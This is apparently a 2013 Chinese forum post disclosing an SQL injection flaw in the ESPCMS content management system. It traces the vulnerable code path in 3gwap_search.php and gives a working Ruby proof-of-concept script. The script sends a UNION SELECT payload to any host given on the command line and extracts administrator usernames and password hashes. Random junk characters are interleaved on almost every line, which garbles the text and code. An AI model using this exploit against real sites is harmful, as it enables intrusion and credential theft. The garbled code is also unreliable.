0×0 漏洞概述0×1 漏洞细节1 }9 t( Q5 n5 a
0×2 PoC
" q$ ?7 n7 a; n N( u! \- w$ F. U; k% t4 B* N( \; v
( L! ?* M* x" E3 w
8 a9 h1 k+ {' }: p
0×0 漏洞概述% A+ n4 U9 t4 d- \
0 O6 V. _/ J" B" a- D
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
" Y6 Y' U2 F, B; E2 `* u其在处理传入的参数时考虑不严谨导致SQL注入发生% J. J/ ~' W% r% [$ h7 v
2 K0 m$ H( J% S$ l* C9 w
, C, v5 K6 y, Y+ B6 O$ R0×1 漏洞细节
: p3 P8 X# F) r7 [$ b7 y1 ?3 r2 ]+ `# [' G# }
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
2 I7 O# V6 {0 h8 [( d' R" Y3 p正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
) s3 L, Z4 f) B v5 d0 S而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。: |! ~* n4 G. x
2 Y' i1 N- Q+ H3 L' s4 `: g
在/interface/3gwap_search.php文件的in_result函数中:
- x; J! ~; E2 y4 P3 X8 H$ i- H, g- u4 F9 `1 `
4 p# P0 d( r% Z$ o' G% k: Q& x, g" F& Y7 X) H$ ]+ ^
function in_result() {
; R i. T7 u) E5 l$ G1 I# O ... ... ... ... ... ... ... ... .../ ^1 [6 Z1 D- N$ I( Y* g
$urlcode = $_SERVER[ 'QUERY_STRING '];. p. v' B/ q$ U, U3 A
parse_str(html_entity_decode($urlcode), $output);. e% m& f I5 Y4 C) c( H# e
8 N0 I8 D9 O) G# P
... ... ... ... ... ... ... ... ...) f" }$ D1 M$ E) Q
if (is_array($output['attr' ]) && count($output['attr']) > 0) {3 @8 T0 s1 D J' y1 w
* z. g! l8 j5 X( Y. I3 E; j $db_table = db_prefix . 'model_att';. {& f1 B! p% d2 l3 j" b
- B% a0 m) J; s: S9 k
foreach ($output['attr' ] as $key => $value) {
5 z/ x- `, k) p4 q% |8 f; ]5 M if ($value) {
+ i% L6 _( m1 _! r( M( F
. X+ o& G/ M& Q) j $key = addslashes($key);# R0 G7 t5 i$ E4 n+ _
$key = $this-> fun->inputcodetrim($key);: \, @( T b& m: [8 L
$db_att_where = " WHERE isclass=1 AND attrname='$key'";: N7 w. |8 a- }3 z8 o
$countnum = $this->db_numrows($db_table, $db_att_where);' w5 e3 |8 w; w( U0 B( ~# _
if ($countnum > 0) {$ V+ ~4 y! _5 f [! n$ c* b: }
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
- D- o1 K/ f5 f" ` }4 B- h5 b! x9 e, [ w
}/ j- Z8 t" c5 o8 z3 X
}' @9 {$ ~9 ^0 [9 y
}
n' U0 C7 a) K7 Y& D if (!empty ($keyword) && empty($keyname)) {
( h- w0 e3 @+ x- B# V8 O $keyname = 'title';
8 ^+ t/ K6 P+ ?7 |* Z $db_where.= " AND a.title like '%$keyword%'" ;& l* J; R2 y7 R; j: U. ]
} elseif (!empty ($keyword) && !empty($keyname)) {) z+ X9 x) j, x0 t8 d% d7 I3 J& |+ H
$db_where.= " AND $keyname like '% $keyword%'";' m+ J b: O* z4 c+ ~" I
}
( R* ^: F" c K/ C" t8 g0 W$ g $pagemax = 15;
5 s2 v' ?. `! T; O) I' v9 _8 ?/ k; ]) h$ X
$pagesylte = 1;$ v4 X2 u) I/ k8 \7 f& ~; ?; i
, r. c; {) B3 g1 l if ($countnum > 0) {
0 J6 Y" w0 N2 {6 x% R
0 ?7 M) S: w C $numpage = ceil($countnum / $pagemax);
2 p' c$ E3 K! V1 [8 I* D7 K } else {
4 j. s/ K( p: P9 R$ D0 a0 h $numpage = 1;( ~0 Y @2 Z: b$ m7 l% M
}
1 Z' S6 X# ~2 N( \ N P $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
) j0 U" ~ U( w G1 ~, Y $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
/ u% b* E* E5 i8 b; X$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
8 T+ A* [7 C/ M* D) ^; v0 `/ { ... ... ... ... ... ... ... ... ...: R5 @6 S8 d; A- L! o) }& g3 e
}, W0 w) K, T8 W5 ^& Y$ g
4 A" N V) S$ V* R
! h: L; O7 q4 a: x4 z0×2 PoC, I9 L4 L5 _+ L# F+ d8 N
, l' J: ^8 g) h2 l, l
- m/ v/ }1 A6 r' l' @# x
3 _# @2 m( O" E+ Frequire "net/http"" F+ w$ C n8 E2 D- n% w
+ L u: b; w3 s8 C X. z9 xdef request(method, url)& R, H1 o9 E0 L' m8 Y
if method.eql?("get")
. z8 y7 M5 Z! ?/ f- s4 c% W8 n uri = URI.parse(url)
9 `( T9 f. Z5 c4 j/ H$ I; g http = Net::HTTP.new(uri.host, uri.port)
& b. e: k9 M+ d! @! R2 m' f response = http.request(Net::HTTP::Get.new(uri.request_uri))
3 O- w& Z* W# A return response
# U- H+ s4 a7 @ end
; D/ `7 S2 D& A' T( D/ lend8 l' v P/ d1 K3 E U
8 O2 S1 O) D9 H/ M
doc =<<HERE f. j. e# x/ E8 X* V: w* z. f @
-------------------------------------------------------6 i. s1 T4 n! S, g" ?! @9 m" I- ?
Espcms Injection Exploit+ p$ \; a- y1 H# J/ K: _( j
Author:ztz, ?3 Y q% R# b4 c" }# f4 a
Blog:http://ztz.fuzzexp.org/
" }( U! m8 t5 x, S9 ?9 ]( L/ A-------------------------------------------------------$ j3 T6 k% a1 ~! T( H
2 C/ g) w3 z! u2 J1 O$ D/ ^HERE! ^6 A% ^: ?+ l* |" f4 ~: x$ D
9 ]* Q: q& w5 ^/ L; B/ n
usage =<<HERE1 Z ^9 D( t% W/ N9 y$ w
Usage: ruby #{$0} host port path' N% B" k: n* q; b
example: ruby #{$0} www.target.com 80 /( s; l9 O) A) y, g* [
HERE
$ k$ V: G6 v- e% f6 R$ y7 L2 m) m. J# E( L! r
puts doc
4 `# A& \$ @) S$ w$ L! jif ARGV.length < 3
! U5 u+ L! b+ [" z8 f& x, p puts usage
) t* g2 P6 ]: {1 v7 x9 belse
* F" v1 t( i: q $host = ARGV[0]
8 [0 c9 g7 T4 w $port = ARGV[1]* @ n. z4 f0 u8 y& f" @
$path = ARGV[2]
9 n5 B+ \& I( \ D5 g& U, {/ z6 i3 P
puts "send request..."
. v8 I" n6 Q2 P/ m7 c* Y3 c url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&& c' p& _# A; J' f, L" _
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
8 G8 V0 s9 ]: g! i,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
$ ?- O$ _ Z& U/ }. g,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
" `7 L* N% l {- A# I q5 q6 r* { response = request("get", url), ^" [ B( E9 P% d4 ]
result = response.body.scan(/\w+&\w{32}/) ~8 B8 m1 ?6 c; W& e
puts result
2 G2 P4 [- h) h5 V: }2 q" W# ^5 xend' _9 L- Q! C- y+ t0 d% G
$ j3 z0 E5 _' S, R; z+ W8 K
|
发表于 2013-7-27 18:31:52
收藏
支持
反对